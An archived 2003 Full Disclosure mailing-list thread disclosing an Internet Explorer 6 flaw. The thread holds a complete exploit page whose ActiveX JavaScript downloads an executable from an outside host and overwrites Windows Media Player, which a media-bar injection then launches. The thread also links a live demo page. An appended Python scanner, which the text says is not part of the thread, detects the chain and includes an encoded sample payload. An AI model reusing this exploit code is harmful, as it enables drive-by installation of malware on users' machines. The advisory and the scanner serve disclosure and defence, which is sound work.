Full Disclosure mailing list archives
Re: Internet explorer 6 on windows XP allows execution of arbitrary code
From: jelmer <jkuperus () planet nl>
Date: Fri, 12 Sep 2003 11:29:29 +0200
When viewing mail in recent versions of Outlook it operates in the Restricted zone, e.g. no active scripting is allowed to run, so these won't be exploitable, unless someone proves otherwise that is ;)

----- Original Message -----
From: "Kristian Hermansen" <khermansen () ht-technology com>
To: "Full Disclosure" <full-disclosure () lists netsys com>
Sent: Friday, September 12, 2003 2:40 AM
Subject: Re: [Full-disclosure] Internet explorer 6 on windows XP allows execution of arbitrary code

Wow, this one is pretty scary. Nice work putting it together. Does anyone know if Outlook is exploitable with this? I'd think that Outlook would not try to play the media file, but I'm not quite sure. Wow, what a rush of pretty critical bugs lately!!!

Kris Hermansen

----- Original Message -----
From: "jelmer" <jkuperus () planet nl>
To: <bugtraq () securityfocus com>
Cc: <full-disclosure () lists netsys com>
Sent: Thursday, September 11, 2003 6:31 PM
Subject: [Full-disclosure] Internet explorer 6 on windows XP allows execution of arbitrary code

Internet explorer 6 on windows XP allows execution of arbitrary code

DESCRIPTION:

Yesterday Liu Die Yu released a series of advisories concerning Internet Explorer. By combining one of these issues with an earlier issue I myself reported a while back, you can construct a specially crafted webpage that can take any action on a user's system, including but not limited to installing trojans, keyloggers, wiping the user's hard drive etc.

TECHNICAL EXPLANATION:

Internet Explorer 6 comes with a media sidebar in which you can load and play media clips without even leaving the browser. When you instruct the media bar to load a file from an unknown host, or the HTTP status returned by an existing host indicates an error, the media bar displays an error page inside the media bar, namely

res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path

res: URLs are treated as being in the "My Computer" zone and are loaded from the user's filesystem: perfect conditions for the issue I describe on http://www.mail-archive.com/full-disclosure () lists netsys com/msg06791.html to work. Now all that is needed is a way to inject this exploit code into this page. This method was graciously provided by Liu Die Yu, as you can read on http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0

Combining these issues we get something like:

--snip--
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows MediaPlayer\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
<script language="javascript">
function preparecode(code) {
  result = '';
  lines = code.split(/\r\n/);
  for (i=0;i<lines.length;i++) {
    line = lines[i];
    line = line.replace(/^\s+/,"");
    line = line.replace(/\s+$/,"");
    line = line.replace(/'/g,"\\'");
    line = line.replace(/[\\]/g,"\\\\");
    line = line.replace(/[/]/g,"%2f");
    if (line != '') { result += line +'\\r\\n'; }
  }
  return result;
}
function doit() {
  mycode = preparecode(document.all.code.value);
  myURL = "file:javascript:eval('" + mycode + "')";
  window.open(myURL,"_media")
}
window.open("error.jsp","_media");
setTimeout("doit()", 5000);
</script>
--snip--

error.jsp is a JSP page that consists of one line, namely

<% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>

DEMONSTRATION:

A demonstration is provided at: http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm

WORKAROUND:

Disable active scripting or do "the sensible thing" and pick another browser, such as the excellent Mozilla Firebird.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
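As an added example, not part of this thread or of jelmer's own code: a small Python scanner that flags the chain the advisory describes in fetched page content (a window opened into the "_media" target, a file:javascript: or res: URL, and an ActiveX download written to disk), and that first undoes the %2f and quote escaping preparecode() applies, so the payload is recognised in the encoded form it travels in as well as in clear. The sample pages and the example.invalid host are constructed.

```python
import re
from urllib.parse import unquote

# Indicators from the chain the advisory describes: the media bar is driven via
# the "_media" window target, the injection vector is a file:javascript: URL
# (riding on a res:// error page), and ActiveX fetches a binary and writes it.
INDICATORS = {
    "media_target": re.compile(r"window\.open\s*\([^)]*['\"]_media['\"]", re.I),
    "file_js_url":  re.compile(r"file:\s*javascript:", re.I),
    "res_url":      re.compile(r"res://", re.I),
    "xmlhttp":      re.compile(r"Microsoft\.XMLHTTP", re.I),
    "adodb_write":  re.compile(r"ADODB\.Stream|SaveToFile", re.I),
    # Only matches once %2f has been decoded back to a slash.
    "remote_get":   re.compile(r"Open\s*\(\s*\\?['\"]GET\\?['\"]\s*,\s*\\?['\"]https?://", re.I),
}

def normalize(content: str) -> str:
    """Undo what preparecode() does to the payload before embedding it in the
    file:javascript:eval('...') URL: slashes become %2f, quotes get a backslash."""
    return unquote(content).replace("\\'", "'")

def scan_html(content: str, normalize_first: bool = True) -> dict:
    text = normalize(content) if normalize_first else content
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    # Opening a clip in the media bar is legitimate on its own; the chain is
    # suspicious when the _media target receives a local-zone URL, and
    # critical when an ActiveX download-and-write payload rides along.
    injects_local = hits["media_target"] and (hits["file_js_url"] or hits["res_url"])
    writes_disk = hits["xmlhttp"] and hits["adodb_write"]
    if injects_local and writes_disk:
        verdict = "critical"
    elif injects_local or writes_disk:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, **hits}

# Constructed samples (not the advisory's demo page). The second one carries
# the payload in the encoded form preparecode() emits.
BENIGN = '<script>window.open("clips/intro.asx", "_media");</script>'
ENCODED_CHAIN = (
    '<script>window.open("error.jsp","_media");'
    'window.open("file:javascript:eval(\''
    "var x = new ActiveXObject(\\'Microsoft.XMLHTTP\\');"
    "x.Open(\\'GET\\', \\'http:%2f%2fexample.invalid%2fpayload.exe\\',0);x.Send();"
    "var s = new ActiveXObject(\\'ADODB.Stream\\');s.Write(x.responseBody);"
    "s.SaveToFile(\\'C:\\\\x.exe\\',2);"
    '\')","_media");</script>'
)
```

Run scan_html() over each fetched page body; the "remote_get" hit is what the decoding step buys you, since the download URL is otherwise hidden behind %2f.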